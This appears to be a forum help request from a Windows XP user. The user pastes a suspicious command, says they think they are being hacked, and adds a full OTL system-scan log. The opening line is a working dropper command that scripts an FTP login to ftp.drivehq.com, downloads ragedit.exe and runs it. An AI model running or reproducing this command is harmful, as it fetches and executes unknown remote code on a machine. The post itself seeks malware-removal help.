cmd / c echo open ftp.drivehq.com 21 >> ik & echo user genieux Elite31337x >> ik & echo binary >> ik & echo get ragedit.exe >> ik & echo bye >> ik & ftp-n-v-s: ik & del ik & ragedit.exe & exit
I think they are hacking me =(
OTL logfile created on: 14/6/2013 11:37:02 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Documents and Settings\Matheus\Meus documentos\Downloads
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: d/M/yyyy
2,99 Gb Total Physical Memory | 1,85 Gb Available Physical Memory | 61,77% Memory free
4,83 Gb Paging File | 3,65 Gb Available in Paging File | 75,52% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Arquivos de programas
Drive C: | 465,75 Gb Total Space | 415,88 Gb Free Space | 89,29% Space Free | Partition Type: NTFS
Computer Name: MATHEUS-01 | User Name: Matheus | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - [2013/06/14 11:28:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Matheus\Meus documentos\Downloads\OTL.exe
PRC - [2013/06/11 16:07:18 | 000,308,248 | ---- | M] () -- C:\Arquivos de programas\Driver LM\lmservice.exe
PRC - [2013/06/06 19:06:24 | 001,641,896 | ---- | M] (Valve Corporation) -- C:\Arquivos de programas\Steam\Steam.exe
PRC - [2013/06/04 15:18:39 | 000,181,664 | ---- | M] (Oracle Corporation) -- C:\Arquivos de programas\Java\jre7\bin\jqs.exe
PRC - [2013/05/29 02:27:40 | 000,825,808 | ---- | M] (Google Inc.) -- C:\Arquivos de programas\Google\Chrome\Application\chrome.exe
PRC - [2013/05/16 11:44:05 | 001,012,000 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de programas\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
PRC - [2013/05/16 11:38:39 | 001,826,592 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de programas\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
PRC - [2013/05/09 05:58:30 | 004,858,968 | ---- | M] (AVAST Software) -- C:\Arquivos de programas\AVAST Software\Avast\AvastUI.exe
PRC - [2013/05/09 05:58:30 | 000,046,808 | ---- | M] (AVAST Software) -- C:\Arquivos de programas\AVAST Software\Avast\AvastSvc.exe
PRC - [2013/03/12 13:20:34 | 000,366,552 | ---- | M] (Intel Corporation) -- C:\Arquivos de programas\Intel\Intel® Management Engine Components\LMS\LMS.exe
PRC - [2013/03/12 07:32:50 | 000,253,816 | ---- | M] (Oracle Corporation) -- C:\Arquivos de programas\Arquivos comuns\Java\Java Update\jusched.exe
PRC - [2013/02/13 12:41:22 | 000,583,680 | ---- | M] (Intel® Corporation) -- C:\Arquivos de programas\Intel\iCLS Client\HeciServer.exe
PRC - [2011/06/14 21:40:48 | 000,088,688 | R--- | M] (VIA Technologies, Inc.) -- C:\WINDOWS\system32\KaraokeSer.exe
PRC - [2011/02/02 14:08:16 | 000,018,656 | ---- | M] () -- C:\Arquivos de programas\Autodesk\Content Service\Connect.Service.ContentService.exe
PRC - [2010/12/07 17:28:06 | 000,579,384 | ---- | M] (Autodesk, Inc.) -- C:\Arquivos de programas\Autodesk\Inventor 2012\Moldflow\bin\mitsijm.exe
PRC - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PRC - [2008/10/15 17:13:58 | 000,439,632 | ---- | M] (RealVNC Ltd.) -- C:\Arquivos de programas\RealVNC\VNC4\winvnc4.exe
PRC - [2008/04/13 18:21:00 | 001,035,776 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2007/11/02 14:52:40 | 000,036,864 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\hppusg.exe
PRC - [2007/05/28 13:57:54 | 000,275,968 | ---- | M] (Rocket Division Software) -- C:\Arquivos de programas\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
========== Modules (No Company Name) ==========
MOD - [2013/06/14 04:40:01 | 002,088,448 | ---- | M] () -- C:\Arquivos de programas\AVAST Software\Avast\defs\13061401\algo.dll
MOD - [2013/06/13 18:11:26 | 013,140,872 | ---- | M] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Google\Chrome\User Data\PepperFlash\11.7.700.225\pepflashplayer.dll
MOD - [2013/06/11 16:07:18 | 000,308,248 | ---- | M] () -- C:\Arquivos de programas\Driver LM\lmservice.exe
MOD - [2013/06/06 19:06:24 | 001,114,536 | ---- | M] () -- C:\Arquivos de programas\Steam\bin\chromehtml.dll
MOD - [2013/06/02 18:46:47 | 000,010,752 | ---- | M] () -- C:\WINDOWS\assembly\GAC\Interop.hpqusg\3.0.0.0__a53cf5803f4c3827\Interop.hpqusg.dll
MOD - [2013/05/29 19:59:08 | 001,226,752 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.WorkflowServ#\46c1da3f2c4c666140a414394e1cb20b\System.WorkflowServices.ni.dll
MOD - [2013/05/29 18:50:52 | 000,303,104 | ---- | M] () -- C:\WINDOWS\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_pt-BR_b77a5c561934e089\mscorlib.resources.dll
MOD - [2013/05/29 02:27:38 | 000,393,168 | ---- | M] () -- C:\Arquivos de programas\Google\Chrome\Application\27.0.1453.110\ppgooglenaclpluginchrome.dll
MOD - [2013/05/29 02:27:35 | 004,051,408 | ---- | M] () -- C:\Arquivos de programas\Google\Chrome\Application\27.0.1453.110\pdf.dll
MOD - [2013/05/29 02:26:36 | 001,597,392 | ---- | M] () -- C:\Arquivos de programas\Google\Chrome\Application\27.0.1453.110\ffmpegsumo.dll
MOD - [2013/05/28 22:24:04 | 000,311,296 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Runtime.Seri#\07de14823c42ee36ffa303d9c89ded36\System.Runtime.Serialization.Formatters.Soap.ni.dll
MOD - [2013/05/28 22:23:08 | 000,971,264 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Configuration\17440cd05eee7f87026b3c17119eed58\System.Configuration.ni.dll
MOD - [2013/05/28 22:19:20 | 012,433,920 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\81b85db6e9fe04e4d1c9547b993acfce\System.Windows.Forms.ni.dll
MOD - [2013/05/28 22:17:56 | 005,450,752 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Xml\fe025743210c22bea2f009e1612c38bf\System.Xml.ni.dll
MOD - [2013/05/28 22:16:55 | 001,593,856 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Drawing\7782f356a838c403b4a8e9c80df5a577\System.Drawing.ni.dll
MOD - [2013/05/28 22:15:32 | 007,977,984 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System\aeac298c43c77d8860db8e7634d9f2eb\System.ni.dll
MOD - [2013/05/28 22:15:27 | 011,492,352 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\mscorlib\eab2340ead8e1a84bdf1a87868659979\mscorlib.ni.dll
MOD - [2013/05/28 22:05:55 | 000,369,664 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel#\98e8641e2ca570f03352a91836b0b97a\System.ServiceModel.Routing.ni.dll
MOD - [2013/05/28 22:05:54 | 001,140,736 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel#\0e5d2997438866de453e8b1401d84398\System.ServiceModel.Discovery.ni.dll
MOD - [2013/05/28 22:05:48 | 000,082,432 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel#\3a75004c8363a598f4997686c16ae55e\System.ServiceModel.Channels.ni.dll
MOD - [2013/05/28 22:04:43 | 001,393,152 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel#\4dbbfceeddfc9180d5f621f0fc586e2c\System.ServiceModel.Activities.ni.dll
MOD - [2013/05/28 22:04:39 | 001,078,272 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\6ff6bd832b03b5d6ea275ba9bee2d3ef\System.IdentityModel.ni.dll
MOD - [2013/05/28 22:04:37 | 018,080,256 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\be692307d47b83000bba8bb6b484aff0\System.ServiceModel.ni.dll
MOD - [2013/05/28 22:04:25 | 001,085,952 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel#\66cd1f52f3d80e02efa25c0fd795a278\System.ServiceModel.Web.ni.dll
MOD - [2013/05/28 22:03:03 | 000,221,696 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceProce#\766ccafdc4a09b964aa9286a15bca48a\System.ServiceProcess.ni.dll
MOD - [2013/05/28 22:03:01 | 001,925,632 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Web.Services\da5ccd3bc4583fb68696cb0c8209daf4\System.Web.Services.ni.dll
MOD - [2013/05/28 22:02:50 | 000,787,456 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\1d254fbc811d0de6c54a9d9c428c4497\System.EnterpriseServices.ni.dll
MOD - [2013/05/28 22:02:50 | 000,236,032 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\1d254fbc811d0de6c54a9d9c428c4497\System.EnterpriseServices.Wrapper.dll
MOD - [2013/05/28 22:02:49 | 000,649,728 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Transactions\dcb0e7d56ffca14d7c483103235b11ad\System.Transactions.ni.dll
MOD - [2013/05/28 22:02:48 | 001,021,952 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runtime.Dura#\019ed4a55ecc7d1f5b933c27970dce9b\System.Runtime.DurableInstancing.ni.dll
MOD - [2013/05/28 22:02:48 | 000,143,360 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\ef7642a4f2724135d445e2ea36582e78\SMDiagnostics.ni.dll
MOD - [2013/05/28 22:02:47 | 002,647,040 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runtime.Seri#\2609614ca03927f7a99418c74844059b\System.Runtime.Serialization.ni.dll
MOD - [2013/05/28 21:34:54 | 006,815,232 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Data\6f120c76113dc5166d2a5a5d21900f39\System.Data.ni.dll
MOD - [2013/05/28 21:34:43 | 001,667,584 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\b573c6a62bb88df0ee2af59b6a8ca910\System.Drawing.ni.dll
MOD - [2013/05/28 21:34:39 | 007,069,696 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Core\2f9e0112e10f9e70d3430d0be9863976\System.Core.ni.dll
MOD - [2013/05/28 21:34:38 | 005,617,664 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml\43cd41484df96d15df949eb17dd88152\System.Xml.ni.dll
MOD - [2013/05/28 21:34:35 | 000,982,528 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Configuration\233661f3a2b632e9553915c8639637d0\System.Configuration.ni.dll
MOD - [2013/05/28 21:34:33 | 009,094,656 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\15872842e3e63ddf0f720f406706198e\System.ni.dll
MOD - [2013/05/28 21:33:11 | 014,412,800 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\3f95a6d480ed1ebe45cf27b770ba94ed\mscorlib.ni.dll
MOD - [2013/05/21 02:56:58 | 000,102,400 | ---- | M] () -- C:\Arquivos de programas\Driver LM\nfapi.dll
MOD - [2013/05/12 18:37:35 | 000,455,968 | ---- | M] () -- C:\Arquivos de programas\NVIDIA Corporation\nview\nvShell.dll
MOD - [2013/05/06 22:05:20 | 000,654,848 | ---- | M] () -- C:\Arquivos de programas\Steam\SDL2.dll
MOD - [2013/03/26 21:16:40 | 020,341,672 | ---- | M] () -- C:\Arquivos de programas\Steam\bin\libcef.dll
MOD - [2013/03/12 13:20:34 | 001,199,576 | ---- | M] () -- C:\Arquivos de programas\Intel\Intel® Management Engine Components\LMS\ACE.dll
MOD - [2012/12/11 14:51:10 | 001,100,800 | ---- | M] () -- C:\Arquivos de programas\Steam\bin\avcodec-53.dll
MOD - [2012/12/11 14:51:10 | 000,192,000 | ---- | M] () -- C:\Arquivos de programas\Steam\bin\avformat-53.dll
MOD - [2012/12/11 14:51:10 | 000,124,416 | ---- | M] () -- C:\Arquivos de programas\Steam\bin\avutil-51.dll
MOD - [2011/02/02 14:08:16 | 000,018,656 | ---- | M] () -- C:\Arquivos de programas\Autodesk\Content Service\Connect.Service.ContentService.exe
MOD - [2010/01/30 02:41:12 | 004,254,560 | ---- | M] () -- C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2009/07/20 14:16:10 | 000,141,312 | ---- | M] () -- C:\Arquivos de programas\WinRAR\RarExt.dll
MOD - [2009/02/27 18:49:12 | 000,311,296 | ---- | M] () -- C:\Arquivos de programas\Arquivos comuns\Adobe\Acrobat\ActiveX\pdfshell.PTB
MOD - [2008/04/13 18:20:34 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll
MOD - [2008/02/07 10:05:18 | 000,163,840 | ---- | M] () -- C:\WINDOWS\system32\hppatusg01.dll
MOD - [2007/11/02 14:52:40 | 000,057,344 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\HPUsageTracking.dll
MOD - [2007/11/02 14:52:40 | 000,036,864 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\hppusg.exe
MOD - [2007/11/02 14:52:38 | 000,114,688 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\HPToolkit.dll
MOD - [2007/11/02 14:52:38 | 000,036,864 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\Enumeration.dll
MOD - [2007/11/02 14:52:22 | 000,065,536 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\HPTools.dll
MOD - [2007/11/02 14:52:16 | 000,016,384 | ---- | M] () -- C:\Arquivos de programas\HP\HP UT\bin\HPStreamsInterface.dll
========== Services (SafeList) ==========
SRV - [2013/06/11 16:07:18 | 000,308,248 | ---- | M] () [Auto | Running] -- C:\Arquivos de programas\Driver LM\lmservice.exe -- (LM Service)
SRV - [2013/06/07 13:09:56 | 001,044,816 | ---- | M] (Flexera Software, Inc.) [On_Demand | Stopped] -- C:\Arquivos de programas\Arquivos comuns\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2013/06/04 15:18:39 | 000,181,664 | ---- | M] (Oracle Corporation) [Auto | Running] -- C:\Arquivos de programas\Java\jre7\bin\jqs.exe -- (JavaQuickStarterService)
SRV - [2013/06/03 16:21:54 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de programas\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/05/16 11:38:39 | 001,826,592 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Arquivos de programas\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2013/05/09 05:58:30 | 000,046,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2013/03/12 13:20:34 | 000,366,552 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Arquivos de programas\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2013/02/13 12:41:36 | 000,637,912 | ---- | M] (Intel® Corporation) [On_Demand | Stopped] -- C:\Arquivos de programas\Intel\iCLS Client\SocketHeciServer.exe -- (Intel®
SRV - [2013/02/13 12:41:22 | 000,583,680 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Arquivos de programas\Intel\iCLS Client\HeciServer.exe -- (Intel®
SRV - [2012/11/19 17:03:24 | 000,489,256 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Arquivos de programas\Arquivos comuns\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2011/06/14 21:40:48 | 000,088,688 | R--- | M] (VIA Technologies, Inc.) [Auto | Running] -- C:\WINDOWS\system32\KaraokeSer.exe -- (KaraokeService)
SRV - [2011/02/02 14:08:16 | 000,018,656 | ---- | M] () [Auto | Running] -- C:\Arquivos de programas\Autodesk\Content Service\Connect.Service.ContentService.exe -- (Autodesk Content Service)
SRV - [2010/12/07 17:28:06 | 000,579,384 | ---- | M] (Autodesk, Inc.) [Auto | Running] -- C:\Arquivos de programas\Autodesk\Inventor 2012\Moldflow\bin\mitsijm.exe -- (mitsijm2012)
SRV - [2010/03/25 10:25:22 | 030,969,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de programas\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)
SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Source Engine\OSE.EXE -- (ose)
SRV - [2008/10/15 17:13:58 | 000,439,632 | ---- | M] (RealVNC Ltd.) [Auto | Running] -- C:\Arquivos de programas\RealVNC\VNC4\winvnc4.exe -- (WinVNC4)
SRV - [2007/05/28 13:57:54 | 000,275,968 | ---- | M] (Rocket Division Software) [Auto | Running] -- C:\Arquivos de programas\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe -- (StarWindServiceAE)
SRV - [2003/04/18 19:06:26 | 000,008,192 | ---- | M] () [Auto | Stopped] -- C:\WINDOWS\system32\srvany.exe -- (KMService)
========== Driver Services (SafeList) ==========
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (i2omgmt)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
DRV - File not found [Kernel | On_Demand | Unknown] -- -- (arc66tro)
DRV - [2013/06/02 18:56:42 | 000,685,816 | ---- | M] () [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\sptd.sys -- (sptd)
DRV - [2013/05/14 11:34:24 | 000,054,576 | ---- | M] (NetFilterSDK.com) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\lmservicedrv.sys -- (lmservicedrv)
DRV - [2013/05/09 05:59:10 | 000,765,736 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\WINDOWS\System32\drivers\aswSnx.sys -- (aswSnx)
DRV - [2013/05/09 05:59:10 | 000,368,944 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP)
DRV - [2013/05/09 05:59:10 | 000,174,664 | ---- | M] () [Kernel | Boot | Running] -- C:\WINDOWS\System32\drivers\aswVmm.sys -- (aswVmm)
DRV - [2013/05/09 05:59:10 | 000,056,080 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2013/05/09 05:59:10 | 000,049,376 | ---- | M] () [Kernel | Boot | Running] -- C:\WINDOWS\System32\drivers\aswRvrt.sys -- (aswRvrt)
DRV - [2013/05/09 05:59:09 | 000,066,336 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\system32\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV - [2013/05/09 05:59:09 | 000,049,760 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (AswRdr)
DRV - [2013/05/09 05:59:08 | 000,029,816 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2013/03/12 13:20:34 | 000,056,432 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\HECI.sys -- (MEI)
DRV - [2012/04/25 15:09:00 | 000,082,032 | R--- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\l1c51x86.sys -- (L1c)
DRV - [2011/06/14 21:40:50 | 002,801,904 | R--- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\viahduaa.sys -- (VIAHdAudAddService)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...ferrer:source?}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://searchou.com/...fc9c14&affilt=5
IE - HKCU\..\SearchScopes,DefaultScope = {B28F43F1-CF7B-4529-B350-AAEB7CCB4162}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE8SRC
IE - HKCU\..\SearchScopes\{B28F43F1-CF7B-4529-B350-AAEB7CCB4162}: "URL" = http://searchou.com/...&affilt=5&r=984
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
========== FireFox ==========
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.21.2: C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.21.2: C:\Arquivos de programas\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\ARQUIV~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\ARQUIV~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@real.com/nppl3260;version=6.0.11.2852: C:\Arquivos de programas\Real Alternative\browser\plugins\nppl3260.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nppl3260;version=6.0.12.46: C:\Arquivos de programas\Real Alternative\browser\plugins\nppl3260.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nprpjplug;version=6.0.12.1662: C:\Arquivos de programas\Real Alternative\browser\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nprpjplug;version=6.0.12.46: C:\Arquivos de programas\Real Alternative\browser\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nsJSRealPlayerPlugin;version=: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Arquivos de programas\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Arquivos de programas\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
[2013/06/13 12:59:03 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de programas\Mozilla Firefox\extensions
========== Chrome ==========
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}
CHR - homepage: http://www.google.com.br/
CHR - plugin: Shockwave Flash (Enabled) = C:\Arquivos de programas\Google\Chrome\Application\27.0.1453.110\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Arquivos de programas\Google\Chrome\Application\27.0.1453.110\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Arquivos de programas\Google\Chrome\Application\27.0.1453.110\pdf.dll
CHR - plugin: Microsoft DRM (Enabled) = C:\Arquivos de programas\Windows Media Player\npdrmv2.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Arquivos de programas\Windows Media Player\npdsplay.dll
CHR - plugin: Microsoft DRM (Enabled) = C:\Arquivos de programas\Windows Media Player\npwmsdrm.dll
CHR - plugin: Google Update (Enabled) = C:\Arquivos de programas\Google\Update\1.3.21.145\npGoogleUpdate3.dll
CHR - Extension: Google Drive = C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Pesquisa do Google = C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Gmail = C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
O1 HOSTS File: ([2001/10/28 08:06:36 | 000,000,776 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Arquivos de programas\Arquivos comuns\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de programas\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Arquivos de programas\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3 - HKLM\..\Toolbar: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Arquivos de programas\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [avast] C:\Arquivos de programas\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [HPUsageTracking] C:\Arquivos de programas\HP\HP UT\bin\hppusg.exe ()
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\nvmctray.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [Nvtmru] C:\Arquivos de programas\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe (NVIDIA Corporation)
